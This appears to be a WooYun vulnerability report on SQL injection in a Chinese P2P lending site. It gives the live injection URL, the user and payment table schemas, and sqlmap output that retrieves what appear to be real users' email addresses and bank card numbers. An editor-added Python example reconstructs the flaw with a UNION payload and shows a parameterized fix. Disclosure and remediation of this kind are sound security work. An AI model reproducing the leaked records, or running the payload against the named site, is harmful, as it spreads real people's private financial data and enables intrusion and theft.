WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2015-07-29: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-09-12: The vendor has actively ignored the vulnerability; details disclosed to the public
Leaks tens of thousands of user records
Injection point: https://www.shandianjr.com/sdmall/detail?itemId=8a2b5b7d4e8d302c014e8da3bf7500ae
Database: p2p_sdd
Table: p2p_user
[55 columns]
+-------------------+---------------+
| Column            | Type          |
+-------------------+---------------+
| accountType       | int(11)       |
| address           | varchar(200)  |
| appLoginStatus    | int(11)       |
| brokerId          | varchar(32)   |
| brokerRate        | decimal(10,8) |
| brokerStatus      | int(11)       |
| busiCode          | varchar(30)   |
| cardno            | varchar(22)   |
| cardnoStatus      | int(11)       |
| createBy          | varchar(32)   |
| createTime        | datetime      |
| deleteTime        | datetime      |
| disposeRemark     | varchar(1000) |
| disposeStatus     | int(11)       |
| email             | varchar(80)   |
| emailStatus       | int(11)       |
| guarType          | varchar(2)    |
| hfUserId          | varchar(50)   |
| id                | varchar(32)   |
| idcard            | varchar(18)   |
| idCardBeginDate   | bigint(20)    |
| idCardEndDate     | bigint(20)    |
| idCardPeriodType  | int(11)       |
| idcardStatus      | int(11)       |
| inBlackList       | tinyint(1)    |
| invitationCode    | varchar(6)    |
| InvitationMobile  | varchar(22)   |
| isDeleted         | tinyint(1)    |
| lastloginip       | varchar(30)   |
| lastlogintime     | bigint(20)    |
| logins            | int(11)       |
| mobile            | varchar(22)   |
| mobileStatus      | int(11)       |
| modify            | int(11)       |
| nickname          | varchar(40)   |
| p2pAccount_id     | varchar(32)   |
| p2pUserAccount_id | varchar(32)   |
| p2pUserInfo_id    | varchar(32)   |
| p2pUserPoint_id   | varchar(32)   |
| password          | varchar(64)   |
| paypassword       | varchar(64)   |
| pointGetTime      | bigint(20)    |
| registerip        | varchar(30)   |
| registertime      | bigint(20)    |
| solt              | varchar(10)   |
| telephone         | varchar(22)   |
| truename          | varchar(40)   |
| updateBy          | varchar(32)   |
| updateTime        | datetime      |
| userLevel         | int(11)       |
| username          | varchar(25)   |
| usrCustId         | varchar(40)   |
| usrMp             | varchar(40)   |
| version           | int(11)       |
| virtualStatus     | int(11)       |
+-------------------+---------------+

Database: p2p_sdd
Table: p2p_user_info
[22 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| address      | varchar(255) |
| area         | varchar(255) |
| birthday     | bigint(20)   |
| city         | varchar(255) |
| createBy     | varchar(32)  |
| createTime   | datetime     |
| deleteTime   | datetime     |
| ecpName      | varchar(255) |
| ecpRelation  | int(11)      |
| ecpTelephone | varchar(255) |
| id           | varchar(32)  |
| isDeleted    | tinyint(1)   |
| mobile       | varchar(255) |
| mobile1      | varchar(255) |
| mobile2      | varchar(255) |
| msn          | varchar(255) |
| province     | varchar(255) |
| qq           | varchar(255) |
| telephone    | varchar(255) |
| updateBy     | varchar(32)  |
| updateTime   | datetime     |
| version      | int(11)      |
+--------------+--------------+

Database: p2p_sdd
Table: p2p_account_cash
[25 columns]
+-------------------+---------------+
| Column            | Type          |
+-------------------+---------------+
| amount            | decimal(19,2) |
| bank              | varchar(150)  |
| branch            | varchar(150)  |
| cardno            | varchar(22)   |
| collected         | decimal(19,2) |
| createBy          | varchar(32)   |
| createTime        | datetime      |
| dealno            | varchar(50)   |
| deleteTime        | datetime      |
| fee               | decimal(19,2) |
| id                | varchar(32)   |
| ip                | varchar(64)   |
| isDeleted         | tinyint(1)    |
| p2pAccountBank_id | varchar(32)   |
| p2pOrder_id       | varchar(32)   |
| p2pUser_id        | varchar(32)   |
| resultCode        | varchar(60)   |
| servFee           | decimal(19,2) |
| status            | int(11)       |
| updateBy          | varchar(32)   |
| updateTime        | datetime      |
| varifyRemark      | varchar(150)  |
| varifyTime        | bigint(20)    |
| verifyManger      | varchar(50)   |
| version           | int(11)       |
+-------------------+---------------+
Dumpable (partial data shown). The columns selected for the dump, address, cardno, createTime, email, id, mobile, p2pAccount_id, password, paypassword, telephone, truename and username, cover bank card numbers, the login and payment password fields and real-name contact details, so the exposure goes well beyond e-mail addresses:
[14:27:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
[14:27:33] [INFO] fetching entries of column(s) 'address, cardno, createTime, email, id, mobile, p2pAccount_id, password, paypassword, telephone, truename, username' for table 'p2p_user' in database 'p2p_sdd'
[14:27:33] [INFO] retrieved: " "," ","2015-03-27 16:40:56","101","101","101",...
[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...
[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","machunyu870221@ms...
[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:36] [INFO] retrieved: " ","622909346304873318","2015-03-27 16:40:56","...
[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","102","102","102",...
[14:27:36] [INFO] retrieved: " ","6228480470739286610","2015-03-27 16:40:56",...
[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...
[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","103","103","103",...
[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wang_doris3561@si...
[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","104","104","104",...
[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","105","105","105",...
[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...
[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","106","106","106",...
[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:47] [INFO] retrieved: " ","6222023100037069205","2015-03-27 16:40:56",...
[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","107","107","107",...
[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","1...
[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:51] [INFO] retrieved: " ","6217002390000517497","2015-03-27 16:40:56",...
[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:51] [INFO] retrieved: " ","6215593100001469450","2015-03-27 16:40:56",...
[14:27:51] [INFO] retrieved: " ","6214850230403088","2015-03-27 16:40:56","73...
[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","zhangxuelovegang@...
[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","108","108","108",...
[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]","...
[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","www.470654506@qq....
[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]",...
[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]"...
[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","[email protected]...
[14:27:55] [INFO] retrieved: " "," ","2015-03-27 16:40:56","109","109","109",...
[14:27:55] [INFO] retrieved: " ","6214830232822972","2015-03-27 16:40:56","95...
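The report gives the injection point and sqlmap's output but not the server-side code, so what follows is an added example written by the editor, not code from shandianjr.com or from this report. It reconstructs the generic flaw such a result implies: a product-detail query that splices the itemId parameter into the SQL text, the UNION payload that reads p2p_user through it (the same cross-table read sqlmap performs above), and the parameterized, allow-listed rewrite that closes it. Everything named here is an assumption: the sd_item table, the six-column subset of p2p_user, the sample rows, and SQLite standing in for the PHP 5.3.3 / MySQL 5.0 stack the fingerprint reports, so that the example runs offline.

```python
import re
import sqlite3

# Editor-added example. The sd_item table, the six-column subset of p2p_user and
# every row below are constructed test data, not data from the report or the site.
ITEM_ID = "8a2b5b7d4e8d302c014e8da3bf7500ae"  # the itemId value in the report's URL
ITEM_ID_RE = re.compile(r"[0-9a-f]{32}")       # allow-list matching that format


def build_db() -> sqlite3.Connection:
    """Create an in-memory SQLite stand-in for the p2p_sdd database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE sd_item (id TEXT PRIMARY KEY, title TEXT, price REAL);
        CREATE TABLE p2p_user (
            id TEXT PRIMARY KEY, username TEXT, email TEXT,
            cardno TEXT, password TEXT, solt TEXT
        );
        """
    )
    conn.execute("INSERT INTO sd_item VALUES (?, ?, ?)", (ITEM_ID, "Sample item", 99.0))
    conn.executemany(
        "INSERT INTO p2p_user VALUES (?, ?, ?, ?, ?, ?)",
        [
            ("101", "user101", "user101@example.com", "", "<hash-101>", "salt-101"),
            ("102", "user102", "user102@example.com", "6222000000000001", "<hash-102>", "salt-102"),
        ],
    )
    return conn


def detail_vulnerable(conn: sqlite3.Connection, item_id: str) -> list:
    """Hypothetical reconstruction of the flaw: itemId is spliced into the SQL text.

    Whatever the request carries in itemId becomes part of the statement, so a
    quote in the parameter ends the string literal and the rest is parsed as SQL.
    """
    sql = "SELECT id, title, price FROM sd_item WHERE id = '" + item_id + "'"
    return conn.execute(sql).fetchall()


def detail_bound_only(conn: sqlite3.Connection, item_id: str) -> list:
    """Parameter binding alone: the payload is sent as data and matches no row."""
    return conn.execute(
        "SELECT id, title, price FROM sd_item WHERE id = ?", (item_id,)
    ).fetchall()


def is_valid_item_id(item_id: str) -> bool:
    """Allow-list check: exactly 32 lowercase hex characters, nothing else."""
    return ITEM_ID_RE.fullmatch(item_id) is not None


def detail_fixed(conn: sqlite3.Connection, item_id: str) -> list:
    """Hardened form: reject anything that is not a well-formed id, then bind it.

    Binding is the actual fix; the allow-list is defence in depth and a cheap
    place to log and alert on injection attempts before they reach the database.
    """
    if not is_valid_item_id(item_id):
        raise ValueError("invalid itemId")
    return detail_bound_only(conn, item_id)


# A UNION payload of the kind sqlmap generates for a string-context injection:
# close the literal, append rows from p2p_user with the same column count, and
# comment out the trailing quote. The space after "--" is required by MySQL.
UNION_PAYLOAD = "x' UNION ALL SELECT id, email, cardno FROM p2p_user-- "


if __name__ == "__main__":
    db = build_db()
    print("normal:", detail_vulnerable(db, ITEM_ID))
    print("leaked:", detail_vulnerable(db, UNION_PAYLOAD))
    print("bound :", detail_bound_only(db, UNION_PAYLOAD))
    try:
        detail_fixed(db, UNION_PAYLOAD)
    except ValueError as err:
        print("fixed :", err)
```

Run it directly to see the three outcomes side by side. The function worth keeping is detail_bound_only: binding alone already turns the payload into an inert string that matches nothing, so the allow-list in detail_fixed is defence in depth and a convenient logging point, not the fix itself.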
The company is growing; the vulnerability should be patched quickly.
Could not reach the vendor, or the vendor actively declined
Vulnerability Rank: 15 (WooYun rating)